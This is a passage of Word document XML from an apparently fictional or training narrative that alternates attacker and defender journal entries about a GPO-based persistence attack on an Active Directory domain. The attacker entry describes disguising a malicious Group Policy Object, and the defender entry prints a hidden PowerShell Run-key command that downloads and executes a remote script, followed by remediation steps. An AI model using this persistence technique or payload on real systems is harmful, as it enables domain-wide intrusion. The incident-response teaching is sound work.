      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>, which is a trusted binary. The network traffic goes to a CDN domain with a valid TLS certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7B2618" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Even if the defender finds the registry key, they'll see it's "managed by Group Policy" and might assume it's legitimate. To remove it, they have to find and delete the GPO, then force replication, then clean every affected workstation. That's days of work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38713133" w14:textId="045CE88A" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">And here's the kicker: I set the GPO's </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gPCMachineExtensionNames</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> to match a legitimate security settings extension. So</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> if they open the GPO in Group Policy Management Console, it looks like a standard security policy. The actual registry setting is buried in the </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>egistry.pol</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> file, which most admins never inspect manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69793A21" w14:textId="1A1B1F31" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I tested it on </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="007B3505">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> workstation: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-TEST-003</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>. The policy applied successfully. The registry key was created. The PowerShell command executed and pulled my test payload. I immediately removed the test workstation from the GPO scope to avoid detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB80490" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Now I wait. On the next Group Policy refresh cycle (every 90 minutes by default, plus reboots), every workstation in the domain will get this persistence mechanism. Hundreds of hosts. Thousands of potential beacons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3093FCD4" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">The defender thinks they won by rotating </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>. They think they found all my persistence. They have no idea that I just turned their entire domain into my botnet, using their own administrative tools against them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385715CD" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I am going to sleep very well tonight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A951CD" w14:textId="4DD2DB32" w:rsidR="007B3505" w:rsidRPr="00A40F32" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 12 – 1015</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9DC392" w14:textId="40B55B54" w:rsidR="007B3505" w:rsidRPr="00A40F32" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defender’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAFEB22" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I found the GPO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DC6CB1" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>It was pure luck. I was running a routine audit of recently created GPOs — something I started doing after the initial compromise — and noticed Security Update - KB5028185 created on November 10 at 2234. The name seemed off. We don't deploy updates via GPO; we use WSUS and Intune. And KB5028185 is a real update, but it's from July 2023. Why would we create a GPO for it now?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73428728" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I opened it in GPMC. At first glance, it looked normal. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">. Standard stuff. But the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gPCMachineExtensionNames</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> attribute had a GUID I didn't recognize: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>{35378EAC-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>683F-11D2-A89A-00C04FBBCFA2}</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>. That's the registry extension GUID. Why would a "security update" GPO need registry extensions?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4806F6" w14:textId="0BF45AB5" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I exported the </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>egistry.pol</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> file and parsed it with</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>arse-</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ol</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ile</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> One entry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49750B40" w14:textId="7C70655A" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="00A40F32" w:rsidP="00A40F32">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Key: SOFTWARE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>icrosoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>urrentVersion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>Value: SecurityHealthHost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>Type: REG_SZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>Data: C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>ystem32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>indowsPowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>owershell.exe -windowstyle hidden -c "while(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>$true){try{iex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>(New-Object Net.WebClient).DownloadString('https://windows-update-catalog[.]cdn[.]com/s/hostcheck.ps1');Start-Sleep -s 86400}catch{Start-Sleep -s 300}}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D7BB4" w14:textId="586F1998" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Oh</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>-oh</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">. Oh </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>fu</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dge</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF7FFC" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">This isn't a security update. This is a domain-wide persistence mechanism. Every workstation that processes this GPO will run a PowerShell command at startup that downloads and executes a payload from an external domain. And because it's delivered via GPO, it looks legitimate. It </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> legitimate, technically — the GPO infrastructure is doing exactly what it's designed to do. The attacker just hijacked it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349DA6FC" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I checked the GPO creation audit logs. Event ID 5136 (Directory Service Changes) shows the GPO was created by svc-backup. Of course it was. We disabled the account's interactive logon but didn't remove it from Group Policy Creator Owners. The attacker still had those credentials and used them to create this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1BF37B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>The scope of this GPO is the entire Workstations OU. That's 847 machines. If even half of them have processed this policy, the attacker has 400+ potential beacons scattered across the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5878AC" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I immediately:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731A20CB" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deleted the GPO</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> from Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C69026F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Forced replication</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> to all DCs via </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>repadmin /syncall /AdeP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738F2B5F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00A40F32" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Started emergency GPO refresh</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> on all workstations using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Invoke-GPUpdate -Force -Computer All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567FCD8D" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blocked the CDN domain</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> at the firewall and DNS level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFD85BE" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initiated a full hunt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>SecurityHealthHost</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> registry key across all endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C00BCF7" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">But here's the nightmare scenario: what if some workstations haven't checked in yet? The GPO refresh is 90 minutes by default. Some machines might be offline, hibernating, or on VPN with slow links. Those machines will process the deleted GPO on their </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> refresh — but Windows caches GPO settings. If the registry key was already applied, deleting the GPO doesn't automatically remove the registry entry. It just stops </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reapplying</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E1BC9" w14:textId="56515244" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>So</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> I need to clean every affected machine manually. Or via script. But pushing a cleanup script to 847 machines </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="007B3505">
        <w:t>itself is</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> a massive operation that the attacker might notice. And if they notice, they might trigger destructive actions before I finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5CAF82" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I also need to consider: is this the </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> malicious GPO? What if there are others? I ran a full audit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCB9262" w14:textId="375A72A1" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="00A40F32" w:rsidP="00A40F32">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>-ADObject -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> {objectClass -eq "groupPolicyContainer"} -Properties gPCFileSysPath, whenCreated, whenChanged | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> {$_.whenCreated -gt (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>).AddDays(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>-30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">)} | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
